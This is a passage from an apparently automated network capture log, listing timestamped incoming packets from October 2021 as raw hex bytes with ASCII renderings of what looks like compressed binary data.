-CPPU#jf~LXgBG:n?x8!H=:Dve%)IJ{O},$ZKFl Vkan\jtvy3R9BT`T0Q5>ZB%EHlM8m[?;[1x'V0a=R_s<~UtvYmMfzhS
2021-10-02 16:13:23 UTC	158	IN	Data Raw: 14 19 69 ca 04 b8 48 22 c3 7f 67 d3 04 48 0e 40 3f 3f b8 8f 12 49 2c fa 65 19 38 40 00 8e fc a8 ed f0 f2 85 88 8a 14 a2 e4 3b 72 f9 fd 65 02 a2 05 ce d7 db db f5 c4 8c c7 31 08 5e bb fd e0 35 9f 2f 9f d7 16 e0 4e ef 33 f7 88 0e d5 ce 1c 28 92 07 ed ec 38 30 27 77 99 fb c3 a4 b1 04 fc a4 47 8a 8e 67 99 89 04 62 24 9a 57 d6 16 22 21 44 13 4d d0 3a 85 ed 7d f0 44 a0 a4 3e 2e 0d 47 0f c7 e7 e5 96 b0 91 73 bd f6 db e7 bf 75 b0 42 96 72 d9 45 21 20 aa e4 10 09 de db 9b 77 db f8 c1 9d 37 c4 40 ad 49 db 4a 94 06 ff 00 a9 3f b6 17 ab 46 f5 78 0f bc 11 18 51 55 c6 dd 0e 1a 08 8c 8b 6c 70 41 08 9b 6e 70 41 11 2c 83 d3 af b3 04 11 4e be be ef e4 e0 86 48 72 01 f9 48 0f 77 c6 d6 f8 1b fc c5 b1 62 4a 02 4b b9 2c 68 05 4f 0f c6 f8 b0 94 a7 33 84 6f 01 db 8b 0c db 74 68 Data Ascii: iH"gH@??I,e8@;re1^5/N3(80'wGgb$W"!DM:}D>.GsuBrE! w7@IJ?FxQUlpAnpA,NHrHwbJK,hO3oth
2021-10-02 16:13:23 UTC	159	IN	Data Raw: 63 d9 b0 f0 c6 1e 12 97 7d 49 39 8d 60 85 82 00 42 4e 2c 9a a4 8c e0 92 48 50 b1 b6 f8 22 c6 0b 62 9a 92 dc 33 e7 13 60 8a 56 58 10 73 fb 67 0b fc 78 6e 7a 75 db 03 83 40 71 1f f6 a6 aa 15 d4 79 f2 85 96 b4 2b b3 8d 20 80 49 c4 5a 82 be 2d 90 cc c6 7d c3 1e 1f 55 38 9d 9e b2 ee 4e a6 34 ea bf 32 9c d9 9e fa 50 b2 cc 1a 53 2e b6 ba 8c e9 0b 48 f5 5a 8d 18 3a 6f bd dc 2d a4 02 5c 48 56 de e6 bb a7 5e 77 85 9e c5 2d 04 e3 99 2d 6b 26 89 12 c2 c0 58 52 b2 76 fe 26 be 91 c2 74 9b b7 97 67 47 9b 0b b4 3b 49 7a 5a 11 65 96 8b b6 d5 26 c6 a9 98 7a c9 b6 b5 ca 58 96 89 32 c9 05 64 ab 09 a6 95 8e de 56 dd 65 a7 5a 8f 0c 04 c3 81 1a 3c 38 ad a4 00 94 47 8c d8 65 94 5b c9 a6 d1 e4 05 80 e9 8f aa ac 92 53 64 91 65 b3 a4 76 64 49 c0 38 00 d8 40 e0 c7 bb 28 fe 72 f6 8e Data Ascii: c}I9`BN,HP"b3`VXsgxnzu@qy+ IZ-}U8N42PS.HZ:o-\HV^w--k&XRv&tgG;IzZe&zX2dVeZ<8Ge[SdevdI8@(r
2021-10-02 16:13:23 UTC	161	IN	Data Raw: d8 ed d6 7b c2 4a 67 d9 d6 85 25 75 c2 92 09 49 ff 00 69 00 96 23 22 37 82 d4 8f 78 b9 6f eb ab 68 2e f9 77 9d d7 69 97 3e cd 39 3d 62 b0 a9 2f 21 4b a9 95 30 03 d8 52 0f 65 8d 7c 63 c8 0c 75 a7 53 ce b8 b5 a9 6b 0b 5d db 93 a4 a4 90 da 16 43 8e c7 0b 08 d5 ea 3c e2 9a 8e c2 96 90 86 56 95 28 8c b8 dc 8a 87 15 1b c6 55 8a 95 ad b7 14 f3 ee 20 29 0d a4 fa 30 5b 2c 86 d4 86 9c 2c 84 85 3a ea 16 e3 48 b1 2e 46 84 dc 76 a3 29 4e 3e db e9 8d 1c b6 b2 21 c1 c8 88 5a 9a 6d 96 d7 fa 9b 49 71 bd 26 52 d6 0a dd 4a 5a 52 ed 4f 8c c0 e5 b6 52 b2 f9 8a b5 15 02 62 c9 98 3f a4 93 20 90 5c 7c 7a 40 43 82 18 17 d0 e4 78 17 a7 8c 67 59 33 3e 56 72 55 5a 34 d8 92 a4 b6 96 5e 64 06 94 86 61 b0 87 09 6f 9e 0f 31 c9 2e 05 90 e9 2b 7e 18 53 8e a1 6d 4a 7d dd 6a 70 8c 49 f6 59 Data Ascii: {Jg%uIi#"7xoh.wi>9=b/!K0Re\|cuSk]C<V(U )0[,,:H.Fv)N>!ZmIq&RJZRORb? \\|z@CxgY3>VrUZ4^dao1.+~SmJ}jpIY
2021-10-02 16:13:23 UTC	162	IN	Data Raw: b8 73 d9 c7 8a dc 4b 5c 77 e9 59 6a 4d 22 86 ea ec e6 64 cc 2d bd 4a a4 25 01 40 2c b0 e3 cd aa 44 e7 40 0b d0 dc 38 ce a4 a9 24 29 d4 f4 1d 1d d3 b2 57 cd f0 65 aa 44 af db 59 d4 4b cf 5a 08 2b 18 88 2c 68 ed 51 5c e9 a4 78 67 48 9f a9 1e 8a 3a 38 b1 4e 37 ad fd 75 de 97 8d 9d 2a 99 67 ba ee f5 4a b5 da 95 35 b1 26 5c f9 92 0a cc 8c 45 8b 4c 01 d2 d1 d3 5e 17 f0 ab 29 70 3a 82 fd 2f 2f 2c d5 b3 45 4d 01 19 8f 35 48 61 2c c8 98 94 e8 52 21 d3 d9 42 de 54 2a 63 0e ea 2d b1 e9 0b 5b e5 21 f7 c8 58 4a 1b f7 3d 98 d8 fb 15 c2 85 61 c5 68 b4 4c 21 6b 9b 31 25 92 a0 96 21 04 82 c0 67 4f 28 fc 85 e9 fb f5 13 b4 bd 33 5e 7f b8 58 4d 8b 66 ec 93 66 1b ba e2 95 35 41 0b 75 90 99 96 a0 59 2a 58 40 60 58 d3 86 79 8a dc 52 c1 0a 24 dc dc dc de f8 eb 92 9c 20 be 6e 74 Data Ascii: sK\wYjM"d-J%@,D@8$)WeDYKZ+,hQ\xgH:8N7ugJ5&\EL^)p://,EM5Ha,R!BTc-[!XJ=ahL!k1%!gO(3^XMff5AuY*X@`XyR$ nt
2021-10-02 16:13:23 UTC	163	IN	Data Raw: 3c e5 e2 92 a2 a3 8f 0a 65 92 c5 2a 24 94 8d 1f 53 96 8e f6 a9 fc 1a 78 e1 c2 b7 26 66 ee 01 2d ce 3c f0 99 b6 5e a9 c4 99 47 72 0c ac e5 16 98 c7 e5 e8 44 97 21 53 a4 3f 40 cc 92 1f 90 fa 9c 89 4f cb 15 1a be 64 72 96 85 3f 50 cb 90 5e 42 d1 8c ab 06 d6 d9 96 51 22 f2 02 cf 6a 57 67 09 a0 7d 7c e9 5a 02 f5 11 d0 6c d7 4b 57 7d b2 62 2c 3b 4d 86 e1 bd b1 04 4e 4c d1 86 cf 88 50 14 93 90 d2 ae 33 2e 29 1c 83 ad 51 aa b9 76 74 da 05 6e 97 54 cb f5 7a 7c f3 16 a9 4d ab 53 d9 a3 4f 85 2e 07 31 b9 71 aa 10 ea 8d 37 3a 2b 8c c9 b3 68 54 c2 d1 25 b7 d9 5c 42 b5 9e 5f 53 2e 64 89 bd b9 2b 0a 04 06 02 b4 de e2 9e fb e3 d7 51 3e cd 69 4a 67 58 ed 72 6d b6 75 a4 14 5a 24 90 50 a7 a8 00 8a 64 4c 51 c8 53 8e 92 cb 4e a9 4a 53 2c b5 1d b2 fc b5 a8 ab 55 d0 08 6e 23 2c Data Ascii: <e*$Sx&f-<^GrD!S?@Odr?P^BQ"jWg}\|ZlKW}b,;MNLP3.)QvtnTz\|MSO.1q7:+hT%\B_S.d+Q>iJgXrmuZ$PdLQSNJS,Un#,
2021-10-02 16:13:23 UTC	165	IN	Data Raw: 75 00 16 35 6a 46 45 17 b3 67 67 38 05 04 e4 e9 55 35 82 09 fc c3 31 54 d6 95 81 b9 49 6e 33 d1 1b b2 8d af a5 20 11 d3 63 6c 64 4b e8 e3 67 a5 ff 00 fd 37 5c e3 33 34 bd 35 a5 5f ec f9 47 2b 6f fd 6e 74 d3 6d 44 e4 59 ef 9b 25 db 45 7f f0 b2 40 6d df 5b 65 53 bd 85 63 d3 a8 79 5f 86 59 3d 23 fd 2d c3 bc af 48 7c 69 2d ca 6e 95 1e 4c b4 2d 16 28 5a 66 cc 12 65 a4 8d b7 4b c0 1d 8d b5 04 91 d0 58 36 56 e1 b1 e1 36 6b 08 c4 90 1f ad 0e 90 45 35 77 4b f1 e6 ce 63 c6 76 93 a7 ce 94 76 b5 4b 99 b4 5b 69 7a 5a e5 ac 61 ea d1 3c d9 92 ca 27 b3 86 5a 86 20 d4 7c 8e 51 91 4a cc 33 e6 87 39 ee a9 4a b0 1b 28 84 e9 1f a5 1b 6f a1 22 d6 49 27 4d ba d8 5b 1b b1 2e 4a 08 08 97 2e 50 14 12 d0 00 42 68 05 06 6e 73 3c 78 c7 92 da ef 3b 5d ad 6b fd d4 f9 96 84 15 62 4c c9 Data Ascii: u5jFEgg8U51TIn3 cldKg7\345_G+ontmDY%E@m[eScy_Y=#-H\|i-nL-(ZfeKX6V6kE5wKcvvK[izZa<'Z \|QJ39J(o"I'M[.J.PBhns<x;]kbL
2021-10-02 16:13:23 UTC	166	IN	Data Raw: 9a 96 11 57 a2 d1 bd 09 2d fa 3a 55 f9 ac e8 af 7a 2f a4 31 e9 32 53 11 d1 32 94 d2 23 c0 71 c1 1a 40 d5 26 44 26 c2 5f 4a 94 71 55 85 54 60 01 a5 29 43 bd be 73 8c 45 24 92 a4 12 ac 25 b1 54 b1 e6 28 08 39 37 87 0d 97 ec f7 db a3 b4 4f 65 6a 9b b0 32 26 6d a9 ab 2c d0 a1 26 af 98 38 53 99 de 99 98 38 7d 51 86 e2 62 c8 9e 98 d1 5a 7a 13 f9 3d ca 94 ca 84 e8 33 aa 59 2a 45 02 a2 9f 45 53 52 27 4b 05 e6 c6 82 f3 d9 9b b6 f3 4b 4d 01 13 b0 a8 22 62 00 49 0e 5d 9c 54 d7 8b c7 23 b4 5b 05 b3 7b 4b 28 ca bc 24 4b 97 6a 29 29 93 6a 92 84 89 c8 72 1f b4 00 2a a8 04 b9 7c bb fa 6c c7 6e df c3 cf b5 f4 26 32 d7 6c 4e 01 53 72 96 79 7c b3 4e 91 9e 61 c4 55 53 22 53 99 6e 44 37 ea 15 11 9f f2 6c 65 f1 77 25 e5 ef ce 52 96 59 88 c5 3b 33 54 24 39 5d 4b 92 2a 7c b3 54 Data Ascii: W-:Uz/12S2#q@&D&_JqUT`)CsE$%T(97Oej2&m,&8S8}QbZz=3YEESR'KKM"bI]T#[{K($Kj))jr\|ln&2lNSry\|NaUS"SnD7lew%RY;3T$9]K*\|T
2021-10-02 16:13:23 UTC	166	IN	Data Raw: 92 0e 19 45 64 96 05 cb 62 27 70 04 65 57 62 d1 e5 33 fa 3b db ad 94 57 5b b2 17 f2 ad 72 64 cc c6 6c 16 99 eb 42 8c aa 9a 25 49 99 2d 75 c2 02 3b 26 b4 20 08 c4 73 9f e0 e3 d9 e7 8d 14 91 9b fb 1e 76 ad cb 55 fa 7b b1 a3 4e 76 8d 52 ab c3 e2 0d 1a 9a ac c3 31 f9 79 7e 15 7a 76 5c 8f 4e ce d9 65 c7 29 ad 48 a7 35 1a b3 95 73 2e 63 44 ea 5b 3e 96 5a 90 99 08 8b 6c bd ac bc 6c 80 cb bd ae b9 88 4c b6 c5 39 09 76 ff 00 b8 6f ad 38 ef 78 ba cb d2 be d0 dc 33 51 27 6c b6 6e 7d 9c 62 08 55 ae 54 85 09 65 20 32 96 e8 eb 12 bd 18 ba 1c 93 ab 11 cf 1e 28 fe 11 fd b3 38 6e 5d 7a 2e 57 cb 3c 44 8a 9f 4c 75 52 72 06 6e a7 bb 52 5c 68 4a 69 61 73 b2 f6 65 6f 2d e6 a6 25 54 54 ae 45 36 23 94 a7 6a 4f 55 18 76 2b 51 54 a5 21 6e ee 2c db 5f 73 da 52 ca 9f 32 56 4f 89 2c Data Ascii: Edb'peWb3;W[rdlB%I-u;& svU{NvR1y~zv\Ne)H5s.cD[>ZllL9vo8x3Q'ln}bUTe 2(8n]z.W<DLuRrnR\hJiaseo-%TTE6#jOUv+QT!n,_sR2VO,
2021-10-02 16:13:23 UTC	167	IN	Data Raw: b7 f2 1f 5c 54 a3 89 5e 55 f7 ef 8c a4 4c c2 de a6 bf 9e 11 30 20 db 71 bf 8e 10 17 56 1d 7c a1 16 ac 47 2e 30 ad df df 89 8b 31 27 7f 91 fb 43 82 01 17 fb d8 e2 09 60 f1 52 99 cb 65 0e a3 73 71 e1 88 0a 70 4e e3 f9 88 6d 75 84 92 01 df c3 02 56 e5 83 d2 b9 fb 73 82 0f 58 f0 3f 2f ae 1a 08 05 28 1d fb 80 c1 00 a9 03 7c 0e 1b 0a b7 79 8f bc 49 49 19 c2 c3 15 d0 36 60 0e 59 57 bf 79 88 89 c9 b0 be 2b 82 03 5f 97 cf fb 60 3c 33 82 12 97 b7 aa 7e 5e 63 c4 78 5f ee d8 46 5e f1 f3 ba 08 73 cb b9 f6 9f 1c 3c 11 12 94 90 a3 63 e1 e3 e1 82 08 88 93 72 41 db 6f bd f0 41 0a eb b5 fb bd d8 20 88 b5 27 c7 f7 c1 04 2d 49 f1 fd f0 41 0e 48 1d 70 41 02 54 a1 bd 85 bb 8f d9 c1 04 46 4d cd f0 41 0d 82 08 58 20 84 76 04 f8 60 82 23 e6 79 7c ff 00 b6 08 21 ca af fa 4e ff 00 Data Ascii: \T^UL0 qV\|G.01'C`ResqpNmuVsX?/(\|yII6`YWy+_`<3~^cx_F^s<crAoA '-IAHpATFMAX v`#y\|!N
2021-10-02 16:13:23 UTC	169	IN	Data Raw: af 1c ca 95 6b 4d 2a 41 a3 52 ba 46 4a 76 37 a5 7b b4 2c 5d fb 55 d6 25 69 09 38 a7 4c c4 a0 0a 4e 1a a8 e1 0e 94 92 cc ed 99 ca 29 27 f1 03 f0 6c cd 6d 2d f9 fc 27 cc b9 31 c2 dc 94 3c 8a 97 0d f3 dc 54 fa 3d 66 49 75 b6 e9 b3 72 a6 65 a9 b6 cd 5b 2e ad 6e 95 4d a9 c7 76 1b f4 d6 fd 16 23 09 7c 25 b4 52 9b b7 6d 2c a9 6e bf f7 25 60 27 b4 a7 28 09 0c 1a a4 d5 c8 04 37 d2 f5 8d 4c eb 9b a6 c9 29 98 45 e9 2e 77 6d c7 f9 31 b9 ca bd 61 53 03 4c 8b 1a 92 0c 63 f2 e1 fe 0a 95 e7 54 db 2f cd a2 49 54 d7 9e 96 db f4 4e 34 51 12 c3 70 a9 e9 69 f6 a8 95 86 e5 d4 a9 f3 29 f2 94 97 26 d1 a3 cd a4 c2 9d 2a 7a 14 c4 c7 58 65 f6 f4 58 89 5b 71 24 15 e0 4a 8b 52 9e 2f 42 da 16 34 8a 08 e9 da ca 65 a6 5c b9 33 50 40 7a 4b 98 fc 4a 49 49 e6 5e 83 48 b6 a3 83 1f 83 95 7a Data Ascii: kMARFJv7{,]U%i8LN)'lm-'1<T=fIure[.nMv#\|%Rm,n%`'(7L)E.wm1aSLcT/ITN4Qpi)&zXeX[q$JR/B4e\3P@zKJII^Hz
2021-10-02 16:13:23 UTC	170	IN	Data Raw: af 08 90 06 67 ea a5 78 eb f0 77 c3 12 6f fa 76 f1 bf f0 77 c5 91 30 61 4a 1d 0f 4c 43 00 71 0c f7 f9 41 07 ce 5f 88 f8 62 60 87 2e 92 9b 1e be 36 fe fe 1e 58 82 01 ce 05 65 4c db ce 04 3a b1 b7 f1 88 09 00 10 03 03 9e 70 a8 0a 00 e2 2e 5e 9c a9 48 2d 69 f1 f9 1f a6 00 8a f6 68 4e 7c 47 7c 34 20 a0 76 07 f7 c5 a5 1d 9a 67 4e 39 d3 d6 02 95 33 8a 71 a6 fd d0 61 65 3b 01 7f 87 d4 62 52 9a 39 15 8b 10 96 a9 ce 84 6f 0d 04 16 49 df 61 f7 e6 71 64 4c cc bb fe f1 2e 17 0a 77 7a c2 a0 02 ef 04 56 54 3b ac 7d b8 ad 49 63 c3 7c 24 0e 16 08 1d 69 f1 f9 1f a6 08 22 32 ad cd c9 b5 f6 de d8 20 81 d4 93 df bf fe a0 7f 8c 10 44 45 67 71 dd 7e eb fc 7a e0 82 10 5a 85 fb ef b6 e3 cc 1e eb 78 60 82 03 04 10 b0 41 02 14 15 d3 bb 04 10 25 64 12 36 eb f7 df 82 08 6d 67 cb e7 Data Ascii: gxwovw0aJLCqA_b`.6XeL:p.^H-ihN\|G\|4 vgN93qae;bR9oIaqdL.wzVT;}Ic\|$i"2 DEgq~zZx`A%d6mg
2021-10-02 16:13:23 UTC	171	IN	Data Raw: 1c 8a f3 af 19 10 25 f2 dd 6d c4 15 ac 2e a0 95 0f e6 4e 8c 40 31 00 b2 9e 8d bb 08 23 8d 08 fb 73 8d db fc 3d 5e ca b5 5e d0 ca e1 ae 67 a1 c6 a8 65 ce 37 70 ef 3c 70 d5 f4 4b 4d 55 2d d3 24 cb a4 bb 3b 2c 3d 31 54 69 54 59 1f 9a c3 4e 5d f4 b7 d4 99 e8 44 ba 7c f6 a4 96 5e 58 37 e7 36 85 25 36 35 ce 41 50 55 9e 6a 42 12 9f a5 69 24 15 15 37 79 70 46 e8 f0 8f d4 54 bb c2 cd b1 16 5d a5 b1 5a 26 ca b5 ec c6 d0 5d b7 85 9e 6d 9c 25 05 56 65 4f 4c ab 64 b9 c8 42 42 66 4a 08 9c e1 38 4b 61 72 45 63 51 dd 61 ee 14 f1 19 12 9d a2 d3 c5 53 87 f9 e1 d4 bd 1e a1 01 b9 11 5d 93 93 f3 09 6e 44 49 a2 ac e1 69 e4 c9 4d 35 c6 64 a1 c8 cf 21 e6 96 a4 a9 0e 05 10 bd 9e 04 5a ae b1 d9 01 2b b2 a6 68 52 7e ae b3 0f d2 e4 90 01 21 aa 1d b8 c7 a6 2a 5c bd ac d8 94 cc b2 5a Data Ascii: %m.N@1#s=^^ge7p<pKMU-$;,=1TiTYN]D\|^X76%65APUjBi$7ypFT]Z&]m%VeOLdBBfJ8KarEcQaS]nDIiM5d!Z+hR~!*\Z
2021-10-02 16:13:23 UTC	172	IN	Data Raw: 37 04 62 e4 fd 49 ff 00 c8 7a c5 71 f0 1b 9c 58 4d 56 b9 53 a9 d3 a7 9a 74 e9 15 15 22 a8 da fd 76 23 bf 3a a9 2e 65 72 40 e7 29 b8 b1 6a 73 99 65 b7 d0 95 25 e7 5c 0d 34 16 96 db 50 0b ee 64 25 a5 c9 0e e3 83 ee fc fa 64 63 4f 68 c3 89 61 3f cb c3 56 fe f5 df 94 79 bc 9a 9c b9 0c b3 4e cc b4 42 e8 ae 47 9c a0 96 e3 a5 f9 08 83 4b 44 af 48 73 d3 e4 29 b8 88 d0 c4 67 e5 c5 0c 96 90 a3 56 71 d6 c0 7c 46 42 ae 39 96 c9 e3 04 a4 a4 07 3f 78 b4 bc cd 22 b1 26 65 52 34 e5 34 a5 52 da 8d 1e 2c 27 9d a8 d3 a9 f2 a3 c7 a6 32 b9 0c b2 f2 e1 34 d4 77 03 d4 6a 3c 76 1b 5b ed 83 16 60 52 0a 12 9b 4a 55 86 16 25 4c 6a fb 6e d3 a0 a6 4c 6a a0 9e bd 75 99 0f 48 d5 06 07 26 a0 ed 42 b6 51 4c 01 2d 3f 06 7b 13 4d 2d b1 21 c5 a9 d7 58 71 b6 54 94 21 29 18 a4 1c 4a 7c 89 a0 Data Ascii: 7bIzqXMVSt"v#:.er@)jse%\4Pd%dcOha?VyNBGKDHs)gVq\|FB9?x"&eR44R,'24wj<v[`RJU%LjnLjuH&BQL-?{M-!XqT!)J\|
2021-10-02 16:13:23 UTC	174	IN	Data Raw: 33 7c a4 11 53 a4 ef 6b 5e e3 a7 d0 77 79 fb 46 26 58 3b df 7e 9c a9 f3 58 72 a0 1b 8c 10 70 81 a4 9b 1e f1 6f 1f 3f ef 8b 62 b2 41 53 97 6d dd d0 e1 68 1f ab 7f 0b 7f 6c 53 30 f6 80 6c c6 7b b3 81 92 7e 96 48 d5 cb 3f ac 0a 55 af 51 02 da 4d bf 7f a6 17 fa 88 21 b5 07 94 25 3b 61 6d cf 41 dd e3 6e b8 21 fa ce 1e 70 45 c3 a4 10 0d ad 6b 6d dd d7 d9 82 15 4a c4 d1 2b 4b 21 3b 9b 79 1b 6d f1 fb ee bf 85 98 f8 79 fe 21 60 c1 04 fe a1 bd fe bd 31 59 82 19 2b 25 3d 08 06 e2 db 7d fc 3d b8 3b e1 80 04 3e 20 fb 8c 32 b5 6d a7 df d3 f9 c1 12 84 a5 4f 88 3b 65 ce 1c 1b f7 11 fb 7c 70 44 8c 29 2f 98 21 98 1a be f2 3d b7 f8 43 7a d7 ea 2d e1 f7 f5 c1 08 a2 09 71 0f 70 3a 91 89 4a 4a b2 a7 3f 48 88 60 b0 7c bd b6 fa e0 50 29 cf ca 08 35 28 28 ec 7b bc b0 31 c2 15 bf Data Ascii: 3\|Sk^wyF&X;~Xrpo?bASmhlS0l{~H?UQM!%;amAn!pEkmJ+K!;ymy!`1Y+%=}=;> 2mO;e\|pD)/!=Cz-qp:JJ?H`\|P)5(({1
2021-10-02 16:13:23 UTC	175	IN	Data Raw: 21 b8 96 ab f5 3a 7a e7 30 cb 0e 4b ab cf 53 12 60 08 8d ad c6 10 54 d5 94 42 ce 24 24 9c 84 30 42 95 90 f4 88 1e 85 2d 31 92 a8 35 63 36 bd f9 8b 0f 8a aa ec f4 09 33 fd 01 d4 40 a6 07 8f 2a 20 52 a9 65 0e 4a 90 e2 39 c8 94 db a3 52 ac 81 81 49 29 ce 9b fe 77 45 8b 48 a6 1a f7 37 db 28 19 14 d9 49 62 34 5a 65 72 34 a8 ce d3 45 1e 7c d9 89 7d 6a 6a 98 a9 6f ce 5d 7a 22 df 65 a6 e0 47 f4 a4 08 61 09 71 d2 1f 5b 6a 5b ae 17 1c 42 a1 0c 48 60 e0 9a fa 9c f3 8a 62 ad 70 6a 62 b4 64 bb 2e 27 e5 8b 98 dd 61 6f 3f 25 89 15 6d 6c 34 d5 39 14 02 f9 88 21 f3 24 24 ae 73 51 c4 45 25 a8 8d 87 08 07 42 d5 90 a4 a4 1c 86 4f 90 f9 eb 04 5b a1 c2 9e e3 55 08 d2 e7 45 87 11 9a 6b f4 c8 b2 63 8d 0b a9 2a a2 93 29 55 39 2e c8 86 a4 be 9a 62 9b 11 26 49 8b cb 75 2f 29 4d 30 Data Ascii: !:z0KS`TB$$0B-15c63@* ReJ9RI)wEH7(Ib4Zer4E\|}jjo]z"eGaq[j[BH`bpjbd.'ao?%ml49!$$sQE%BO[UEkc*)U9.b&Iu/)M0
2021-10-02 16:13:23 UTC	176	IN	Data Raw: 5a c8 50 00 3d 1f 86 70 32 54 19 47 88 e7 dd 07 cd 56 c2 f6 00 8e 9e 03 cc 75 fe 71 5c d4 b2 3b 21 cb 8d 73 f1 a4 58 84 28 39 1f 48 6a bb f2 6f 1a c1 73 3f f3 1f 9e 2b 4b b5 73 88 5a 4a 8f 06 63 ef c6 1c 28 dc 10 a2 6d fe db dc 1f 6e 1a 23 a8 47 fb 87 ff 00 94 4a 97 53 7e ee 9e df 90 c1 0a 52 45 48 87 2e 02 7a 58 78 8f 67 85 b0 00 f4 11 11 22 1c 58 fd 24 69 e9 bd fa ed fc 7d 31 90 a0 58 8d e1 c7 c7 87 09 c4 1c 9a 8a 6f a7 c3 00 6e 47 aa 46 fd 09 df ef ec 78 e2 90 70 1a be ea 07 f4 87 4a 19 f5 a7 94 08 5a 93 60 ab 0f 30 37 ef f0 b9 fb f0 c5 a1 40 e4 47 a7 ac 52 b4 80 e5 27 b4 34 6f 27 e5 ae 7a 3c 10 71 37 dc f8 f7 1f 0d bb bc 71 49 cc f3 31 72 1c 82 f5 d7 30 69 a8 3c a0 c2 94 3a 28 8f ff 00 95 b0 f2 c9 34 3e 19 b6 9f 68 55 4a 4a 8e ef 1f 6f b4 12 1d 52 7a Data Ascii: ZP=p2TGVuq\;!sX(9Hjos?+KsZJc(mn#GJS~REH.zXxg"X$i}1XonGFxpJZ`07@GR'4o'z<q7qI1r0i<:(4>hUJJoRz
2021-10-02 16:13:23 UTC	178	IN	Data Raw: b0 bd 1c 48 0a bb 6b 71 c8 29 38 71 17 76 7e e7 67 cb 74 04 10 58 82 0e e2 18 c5 1c b9 d4 69 e9 14 d7 e9 28 93 17 2d 37 2a 7b 94 e8 ed ba 57 06 9b 43 90 86 19 8a b9 11 e4 47 86 e4 3c c3 11 71 a5 cf a8 b0 d3 6e 4a e4 21 d6 42 d4 a5 29 42 08 02 a4 67 f6 89 4a b0 f9 73 89 03 34 59 b9 95 9a 90 75 2f 3a 66 33 10 32 99 cd 3d 4e 93 53 54 03 2a 35 47 53 d1 e3 53 d0 c4 5a 5a 3d 08 30 a0 16 eb ca 0b d2 b5 00 54 e7 0a b3 20 eb 9e b1 6b 8d e3 c7 f3 16 88 50 28 ee c4 aa b8 f5 4e 53 d0 5c a7 6a 80 64 2e 3b ee 51 68 9f 98 b0 15 a1 81 26 32 4c a1 52 6d e5 21 a2 24 c7 f4 74 b4 95 b4 0a 94 53 4f d2 4b 68 4f 13 ac 52 73 3c cc 4a 61 4c 5c 65 a9 ba ab 92 33 52 6a c8 71 55 16 d0 da a2 26 b8 a8 8b 6a 35 35 32 11 24 41 43 2e d2 77 71 ee 5e bd 69 52 6f ea 8b b6 33 b9 b8 10 47 ad Data Ascii: Hkq)8qv~gtXi(-7{WCG<qnJ!B)BgJs4Yu/:f32=NST5GSSZZ=0T kP(NS\jd.;Qh&2LRm!$tSOKhORs<JaL\e3RjqU&j552$AC.wq^iRo3G
2021-10-02 16:13:23 UTC	179	IN	Data Raw: fd df 4c 11 59 60 69 97 cd d0 26 4d b6 45 94 3b c9 be c7 cb 16 63 2d c7 7f af ce 30 39 19 13 06 24 92 91 a4 90 7b ef f2 f0 37 ee f3 f6 8c 57 8c 24 9c 41 f9 fb 67 df 13 88 d6 b9 f9 43 a9 e4 dd 2a d4 0a bb c7 70 24 1b fb 3f 7e 9e cc 41 42 95 50 a6 14 f8 6b ed 0b 0e 99 02 fb d8 5b 7d 88 ee f6 9f e3 00 04 50 97 e3 0c 95 11 cb 74 48 a9 28 3d 77 b0 27 4d b6 23 c4 ef d0 7b 47 bf 0e 82 01 ae e8 6e b3 87 9f e2 20 e7 9f 14 db b8 0b 6d fb e1 96 41 66 2f 9f b4 56 6b 58 af 0e 8b f8 79 83 f4 c5 7d 5b 76 fe 56 9e fb e1 a5 2b 13 8f 2d df dc 39 76 dd ff 00 fb ad fb e0 86 99 a7 7f b4 37 36 fe 7f ff 00 2b e1 16 bc 30 a9 4e 28 45 c2 45 ba 7b ef fc 62 50 97 2f aa bc 9e b1 2a 53 f6 77 51 ce 74 f9 ab c4 4b 79 23 48 24 ea 1e 5b 6e 76 df e1 dd 87 32 d8 e2 cf d9 84 55 88 62 c3 f3 Data Ascii: LY`i&ME;c-09${7W$AgCp$?~ABPk[}PtH(=w'M#{Gn mAf/VkXy}[vV+-9v76+0N(EE{bP/SwQtKy#H$[nv2Ub
2021-10-02 16:13:23 UTC	180	IN	Data Raw: b4 cb eb a4 4a 36 f9 69 9a 09 c2 c4 a4 28 ac 11 51 85 49 06 a4 d2 3c 4a 9e cd 62 3c 3a 94 b6 5d 66 6c 7a 1b 88 80 9f c8 96 d2 5f 9b 0a 8d 20 cc ab 4e 7a a2 f3 ec 3d 01 ca a5 3a 62 e2 34 a6 e3 b8 e5 4c 30 e3 2b 4b 0d c4 68 1c b2 b4 4c ac b9 80 a4 7f 10 da b7 e3 ee 23 af 21 2e 50 99 a8 9b 31 00 2a 62 a5 ac 4c 49 49 c8 e2 1c 72 af 96 4d 3a b7 50 83 15 b9 73 a8 af 39 2a ba 82 f2 50 f5 33 f3 77 dc 9e cb 88 19 56 1d 45 73 63 a9 94 34 68 c9 58 02 0b af 05 ad 2a 90 b5 b5 25 0f a0 ac 44 5b 9e 45 06 40 ff 00 49 b5 02 3a 96 89 ea 60 45 65 29 99 24 b6 98 4a 9c fe 62 0f c6 75 10 17 25 c7 52 ed 38 a9 26 ec a1 6a 41 5a 54 84 b4 a2 08 89 72 b2 ad 5d 54 d9 8e 44 08 a7 53 63 c2 90 fc 2a 62 e4 98 8c 45 a8 4e 72 3b 59 7a 66 a5 a6 3c 64 b1 33 4c b9 2e 3c 1c 0e 03 a0 a4 a0 9d Data Ascii: J6i(QI<Jb<:]flz_ Nz=:b4L0+KhL#!.P1bLIIrM:Ps9P3wVEsc4hX%D[E@I:`Ee)$Jbu%R8&jAZTr]TDScbENr;Yzf<d3L.<
2021-10-02 16:13:23 UTC	181	IN	Data Raw: 01 00 d7 2f 9a 43 07 bd 9f 03 89 05 c3 c4 e0 1c 7c be d0 45 f0 7a fd fc b0 81 41 25 4f a9 f7 30 60 1c 7c be d0 c1 e0 49 17 eb 61 bd ec 2d ee 17 fb 18 60 a0 4b 7a c4 29 00 07 0f 13 73 82 12 3b cf 91 b6 fd 7c fe a7 c3 0c 4b 07 84 15 20 71 88 f9 ba c1 55 fa 78 fd 6e 3f 63 e3 7c 26 31 c6 2c c0 38 f9 7d a0 39 c3 cb e0 70 25 78 a9 4d 7c b4 85 52 30 d7 e5 62 64 be 12 9b d8 1e ff 00 2f 0f 03 f7 e7 86 25 83 c2 00 e5 a0 39 ba f5 2b 61 61 7b 58 ff 00 6b 7c 0f c3 a2 09 80 bd 32 2d 4f ee 2d ea c0 67 7a d7 4f cc 07 38 79 1f 72 bf 83 88 52 81 0c 1f 38 30 0e 3e 5f 68 7e 77 5d c0 bd c6 c0 f7 fb 6f 83 ac 61 5e 15 fb 88 3a b0 68 1d fb a0 92 fd ec 9b f9 5f 